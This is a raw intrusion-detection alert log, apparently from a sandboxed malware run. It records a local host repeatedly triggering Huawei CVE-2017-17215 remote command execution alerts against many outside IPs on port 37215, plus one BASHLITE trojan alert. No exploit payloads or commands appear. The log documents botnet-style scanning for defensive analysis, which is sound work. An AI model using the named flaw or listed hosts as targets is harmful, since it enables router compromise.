                                            06/14/24-10:43:52.148115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5700237215192.168.2.1441.178.166.11
                                            06/14/24-10:43:58.275104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4478837215192.168.2.14156.57.150.143
                                            06/14/24-10:43:52.164392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5016237215192.168.2.14156.25.77.184
                                            06/14/24-10:43:39.789297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3704037215192.168.2.14156.40.87.121
                                            06/14/24-10:44:35.179527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4943637215192.168.2.14197.105.8.151
                                            06/14/24-10:44:31.053895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4564237215192.168.2.14197.215.200.232
                                            06/14/24-10:43:34.677750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737637215192.168.2.14156.128.6.30
                                            06/14/24-10:44:00.321746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5006037215192.168.2.14197.69.226.44
                                            06/14/24-10:44:20.806496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026837215192.168.2.14156.75.61.12
                                            06/14/24-10:43:34.677365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4091837215192.168.2.1441.45.227.75
                                            06/14/24-10:43:58.276057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3357837215192.168.2.14197.33.128.23
                                            06/14/24-10:43:37.761560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4311237215192.168.2.14156.214.144.66
                                            06/14/24-10:44:31.052725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4679437215192.168.2.14197.6.55.240
                                            06/14/24-10:43:56.230697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3804837215192.168.2.14197.87.111.220
                                            06/14/24-10:44:00.338602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4339437215192.168.2.14156.208.182.212
                                            06/14/24-10:44:10.566614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4337837215192.168.2.14197.228.180.3
                                            06/14/24-10:44:00.321698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4123637215192.168.2.1441.43.16.94
                                            06/14/24-10:44:00.324296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114237215192.168.2.14197.140.149.20
                                            06/14/24-10:44:16.732941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3477437215192.168.2.1441.93.56.229
                                            06/14/24-10:44:10.544835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5634237215192.168.2.1441.71.141.149
                                            06/14/24-10:44:00.336677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5661437215192.168.2.14156.102.217.231
                                            06/14/24-10:43:39.811765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081037215192.168.2.14197.23.179.245
                                            06/14/24-10:44:24.917889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6097837215192.168.2.14197.135.72.38
                                            06/14/24-10:44:00.321836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5025437215192.168.2.14156.46.148.186
                                            06/14/24-10:43:37.761827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3824437215192.168.2.14156.194.92.153
                                            06/14/24-10:43:58.291116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5416437215192.168.2.14197.236.68.3
                                            06/14/24-10:44:14.687170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4155437215192.168.2.14156.46.172.6
                                            06/14/24-10:44:02.384220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3516837215192.168.2.14197.122.220.106
                                            06/14/24-10:43:43.942509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4550437215192.168.2.14197.252.93.18
                                            06/14/24-10:44:02.226110TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)5945223192.168.2.14101.23.0.0
                                            06/14/24-10:43:43.968611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5509837215192.168.2.14197.206.1.208
                                            06/14/24-10:44:12.646746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5217037215192.168.2.1441.98.244.59
                                            06/14/24-10:44:20.827898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4752637215192.168.2.14197.3.201.237
                                            06/14/24-10:44:16.715540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4677637215192.168.2.1441.163.39.213
                                            06/14/24-10:44:08.519856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5253837215192.168.2.14156.1.178.143
                                            06/14/24-10:43:41.847757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3560037215192.168.2.1441.22.208.78
                                            06/14/24-10:43:56.245658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5261637215192.168.2.14156.186.126.21
                                            06/14/24-10:44:02.369216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5132637215192.168.2.14156.71.235.101
                                            06/14/24-10:44:00.341089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5312037215192.168.2.14156.111.250.212
                                            06/14/24-10:44:08.520609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5265237215192.168.2.1441.120.99.191
                                            06/14/24-10:44:26.998492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3595237215192.168.2.1441.253.200.124
                                            06/14/24-10:44:29.025734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6057637215192.168.2.1441.144.43.26
                                            06/14/24-10:44:06.453139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5168437215192.168.2.14197.149.86.103
                                            06/14/24-10:44:20.829170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4072637215192.168.2.14156.76.220.24
                                            06/14/24-10:43:39.812914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922637215192.168.2.14156.162.139.157
                                            06/14/24-10:44:31.053672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5829837215192.168.2.1441.27.151.172
                                            06/14/24-10:43:39.790086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5461237215192.168.2.1441.78.236.244
                                            06/14/24-10:43:52.146266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3375837215192.168.2.1441.195.112.77
                                            06/14/24-10:43:52.162293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6051837215192.168.2.1441.51.67.129
                                            06/14/24-10:44:22.860995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5931237215192.168.2.1441.140.2.198
                                            06/14/24-10:44:12.616160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6050037215192.168.2.1441.155.17.0
                                            06/14/24-10:44:12.618521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3327837215192.168.2.14156.36.213.235
                                            06/14/24-10:44:26.986456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4893037215192.168.2.14197.29.103.107
                                            06/14/24-10:43:52.143572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3738637215192.168.2.14197.219.176.254
                                            06/14/24-10:44:04.419973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3361037215192.168.2.14156.56.234.235
                                            06/14/24-10:44:29.014196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4296437215192.168.2.14197.13.86.109
                                            06/14/24-10:44:29.023263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3708037215192.168.2.14156.62.3.233
                                            06/14/24-10:43:39.789880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4353037215192.168.2.14197.122.252.45
                                            06/14/24-10:43:54.201072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5801437215192.168.2.14156.199.100.244
                                            06/14/24-10:44:16.715747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699637215192.168.2.1441.32.17.148
                                            06/14/24-10:43:37.762909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5110237215192.168.2.14156.162.62.98
                                            06/14/24-10:44:06.472497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3776637215192.168.2.14197.92.166.145
                                            06/14/24-10:44:04.408013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974637215192.168.2.14156.153.123.154
                                            06/14/24-10:43:56.245613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482637215192.168.2.14197.137.42.110
                                            06/14/24-10:43:58.290211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4008037215192.168.2.14197.61.123.216
                                            06/14/24-10:43:45.965318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883437215192.168.2.14156.183.91.115
                                            06/14/24-10:43:34.679005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3857237215192.168.2.14197.16.96.59
                                            06/14/24-10:44:04.407024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4234037215192.168.2.14156.255.200.254
                                            06/14/24-10:44:12.614445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3676037215192.168.2.14197.187.166.10
                                            06/14/24-10:43:50.074628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5751637215192.168.2.1441.117.2.45
                                            06/14/24-10:44:24.934625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5220837215192.168.2.1441.98.149.4
                                            06/14/24-10:43:54.182956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469837215192.168.2.14197.136.30.37
                                            06/14/24-10:44:16.735304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576237215192.168.2.14156.61.52.184
                                            06/14/24-10:43:56.227756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3825837215192.168.2.14197.87.11.21
                                            06/14/24-10:44:24.942448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5279237215192.168.2.1441.80.191.97
                                            06/14/24-10:43:56.230049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769237215192.168.2.14156.160.231.20
                                            06/14/24-10:43:56.245208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5613637215192.168.2.14197.164.85.101
                                            06/14/24-10:44:14.684277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4620637215192.168.2.14156.248.186.91
                                            06/14/24-10:44:18.766883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5181437215192.168.2.14156.141.96.199
                                            06/14/24-10:44:18.766994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3793237215192.168.2.14197.123.254.247
                                            06/14/24-10:43:43.968903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5308437215192.168.2.14197.83.14.13
                                            06/14/24-10:43:50.111518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5166837215192.168.2.14156.87.212.140
                                            06/14/24-10:44:31.053711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4773237215192.168.2.14197.153.132.149
                                            06/14/24-10:43:54.185619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3781837215192.168.2.14156.19.175.54
                                            06/14/24-10:43:56.228075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4214637215192.168.2.14156.244.170.185
                                            06/14/24-10:44:06.469646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345837215192.168.2.14197.29.98.252
                                            06/14/24-10:44:06.449381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5776637215192.168.2.14197.103.91.217
                                            06/14/24-10:43:34.661802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3939237215192.168.2.14156.70.90.47
                                            06/14/24-10:43:45.969028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4076437215192.168.2.14156.158.186.227
                                            06/14/24-10:43:41.849887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3530037215192.168.2.14197.67.213.250
                                            06/14/24-10:43:52.146878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5359437215192.168.2.1441.58.242.133
                                            06/14/24-10:43:50.111305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4482237215192.168.2.1441.125.166.148
                                            06/14/24-10:44:35.178863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3361837215192.168.2.14156.159.131.178
                                            06/14/24-10:44:08.501737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3697237215192.168.2.1441.206.118.42
                                            06/14/24-10:43:48.032922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4953637215192.168.2.1441.64.210.95
                                            06/14/24-10:44:14.671114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5227237215192.168.2.14156.101.129.84
                                            06/14/24-10:44:04.423570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031637215192.168.2.14156.204.219.254
                                            06/14/24-10:44:29.022097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5146037215192.168.2.1441.72.254.17
                                            06/14/24-10:44:26.999768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6011637215192.168.2.1441.115.140.232
                                            06/14/24-10:43:39.808082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439437215192.168.2.14197.103.242.245
                                            06/14/24-10:44:14.669404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933037215192.168.2.14156.62.225.88
                                            06/14/24-10:43:50.111973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5815037215192.168.2.14156.80.161.165
                                            06/14/24-10:44:08.504355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5882237215192.168.2.14156.40.190.144
                                            06/14/24-10:43:39.791664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5705437215192.168.2.14156.3.195.204
                                            06/14/24-10:44:33.134090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4366837215192.168.2.1441.225.2.252
                                            06/14/24-10:44:10.565938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233837215192.168.2.14197.114.55.62
                                            06/14/24-10:43:54.185718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373437215192.168.2.1441.76.81.182
                                            06/14/24-10:43:58.293187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4127837215192.168.2.1441.206.86.60
                                            06/14/24-10:44:20.807629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543637215192.168.2.1441.199.227.122
                                            06/14/24-10:44:20.803505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520837215192.168.2.14197.234.104.177
                                            06/14/24-10:44:33.133466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919237215192.168.2.14156.110.172.52
                                            06/14/24-10:44:04.410351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3495437215192.168.2.14197.114.167.85
                                            06/14/24-10:44:29.022274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3555437215192.168.2.1441.24.90.249
                                            06/14/24-10:44:31.057118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5307837215192.168.2.14156.207.52.77
                                            06/14/24-10:43:45.985025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4251437215192.168.2.14197.28.106.188
                                            06/14/24-10:44:10.548284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3633237215192.168.2.14197.169.124.227
                                            06/14/24-10:43:56.252964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4846237215192.168.2.14197.50.146.53
                                            06/14/24-10:43:52.147119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772037215192.168.2.14197.176.255.41
                                            06/14/24-10:44:02.382631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628437215192.168.2.14197.175.133.118
                                            06/14/24-10:44:12.617511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4304237215192.168.2.1441.222.128.182
                                            06/14/24-10:43:41.904919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3347037215192.168.2.14197.78.73.132
                                            06/14/24-10:43:58.274480TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5676437215192.168.2.1441.164.46.13
                                            06/14/24-10:43:45.967834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4446437215192.168.2.14156.246.202.142
                                            06/14/24-10:44:00.340295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4140637215192.168.2.14197.31.154.62
                                            06/14/24-10:43:58.295129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4921637215192.168.2.1441.244.149.203
                                            06/14/24-10:44:18.763571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5545637215192.168.2.14156.212.60.55
                                            06/14/24-10:44:31.053994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3490837215192.168.2.14156.25.144.209
                                            06/14/24-10:43:36.724249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4212837215192.168.2.1441.78.28.179
                                            06/14/24-10:44:00.341831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3426037215192.168.2.14197.90.224.197
                                            06/14/24-10:43:58.273764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3535837215192.168.2.1441.217.143.218
                                            06/14/24-10:44:18.761340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3984637215192.168.2.14156.44.152.35
                                            06/14/24-10:43:58.276514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5094437215192.168.2.1441.124.103.141
                                            06/14/24-10:44:20.806052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4984837215192.168.2.14156.98.132.190
                                            06/14/24-10:44:06.470549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4916437215192.168.2.1441.151.230.223
                                            06/14/24-10:44:08.517362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5759437215192.168.2.14156.164.146.165
                                            06/14/24-10:44:08.504896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4410037215192.168.2.14156.56.221.70
                                            06/14/24-10:44:29.022749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5969237215192.168.2.14156.71.146.175
                                            06/14/24-10:44:29.011062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4139437215192.168.2.14156.13.0.253
                                            06/14/24-10:44:35.177088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5029637215192.168.2.14197.73.187.37
                                            06/14/24-10:43:50.073344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5531437215192.168.2.14156.206.196.47
                                            06/14/24-10:43:41.906954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5007037215192.168.2.14197.230.201.236
                                            06/14/24-10:44:24.914652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4488837215192.168.2.14197.18.64.198
                                            06/14/24-10:44:20.804334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255237215192.168.2.1441.44.44.96
                                            06/14/24-10:43:34.675424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5897437215192.168.2.14197.228.135.200
                                            06/14/24-10:43:52.146748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3752637215192.168.2.14156.234.158.94
                                            06/14/24-10:43:50.074276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5592637215192.168.2.14197.3.96.141
                                            06/14/24-10:43:34.662615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360237215192.168.2.14156.72.192.166
                                            06/14/24-10:44:24.914870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5811037215192.168.2.14156.251.224.182
                                            06/14/24-10:43:54.186230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3983837215192.168.2.1441.242.69.69
                                            06/14/24-10:43:48.031806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6054237215192.168.2.14197.125.197.164
                                            06/14/24-10:43:39.791129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5979237215192.168.2.14197.202.174.54
                                            06/14/24-10:44:22.881520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4710837215192.168.2.14197.109.196.60
                                            06/14/24-10:44:08.521462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4526437215192.168.2.14197.8.245.164
                                            06/14/24-10:44:16.716098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3406237215192.168.2.14197.146.6.115
                                            06/14/24-10:44:08.503268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4613237215192.168.2.1441.26.98.231
                                            06/14/24-10:43:34.661950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4627437215192.168.2.14197.143.65.56
                                            06/14/24-10:44:14.666391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5213037215192.168.2.14156.24.80.12
                                            06/14/24-10:44:04.409368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5575437215192.168.2.14156.83.74.32
                                            06/14/24-10:43:52.143016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4689437215192.168.2.14197.129.226.27
                                            06/14/24-10:44:31.089992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442437215192.168.2.14156.23.16.108
                                            06/14/24-10:43:56.224520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5121037215192.168.2.14156.224.75.198
                                            06/14/24-10:43:43.971137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5456437215192.168.2.14197.225.214.148
                                            06/14/24-10:43:50.111755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3424437215192.168.2.14156.156.180.210
                                            06/14/24-10:44:29.027455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4391037215192.168.2.14156.36.167.12
                                            06/14/24-10:43:56.253320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4318037215192.168.2.14197.92.190.172
                                            06/14/24-10:43:45.992043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5064637215192.168.2.1441.92.80.173
                                            06/14/24-10:43:56.227099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4923437215192.168.2.1441.105.69.36
                                            06/14/24-10:44:26.997114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3284437215192.168.2.14156.250.5.23
                                            06/14/24-10:43:36.701098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4522437215192.168.2.14197.84.85.34
                                            06/14/24-10:44:31.057267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4952437215192.168.2.1441.103.107.213
                                            06/14/24-10:44:33.134870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3827037215192.168.2.14156.14.82.155
                                            06/14/24-10:43:48.020171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3500637215192.168.2.14197.80.191.196
                                            06/14/24-10:44:31.086829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5898637215192.168.2.1441.141.5.1
                                            06/14/24-10:43:37.761099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4875837215192.168.2.14197.77.45.169
                                            06/14/24-10:44:00.341936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4444037215192.168.2.14156.55.147.51
                                            06/14/24-10:44:12.615011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4144037215192.168.2.14197.253.217.25
                                            06/14/24-10:43:48.030478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4227437215192.168.2.14156.194.182.59
                                            06/14/24-10:44:12.640696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468837215192.168.2.1441.175.71.113
                                            06/14/24-10:44:29.013898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544837215192.168.2.14197.156.75.75
                                            06/14/24-10:44:06.452952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3863837215192.168.2.14197.243.68.79
                                            06/14/24-10:43:36.726565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4187437215192.168.2.1441.137.152.216
                                            06/14/24-10:44:29.025107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5468037215192.168.2.1441.98.252.198
                                            06/14/24-10:44:04.420487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5250437215192.168.2.1441.209.6.80
                                            06/14/24-10:44:12.615854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5211237215192.168.2.1441.54.37.136
                                            06/14/24-10:43:34.679500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4046237215192.168.2.1441.137.106.91
                                            06/14/24-10:43:37.772496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4690037215192.168.2.1441.7.148.192
                                            06/14/24-10:44:29.013513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4036637215192.168.2.14197.68.204.101
                                            06/14/24-10:44:27.001582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4035237215192.168.2.14197.153.196.250
                                            06/14/24-10:44:18.777029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5149237215192.168.2.14197.43.131.221
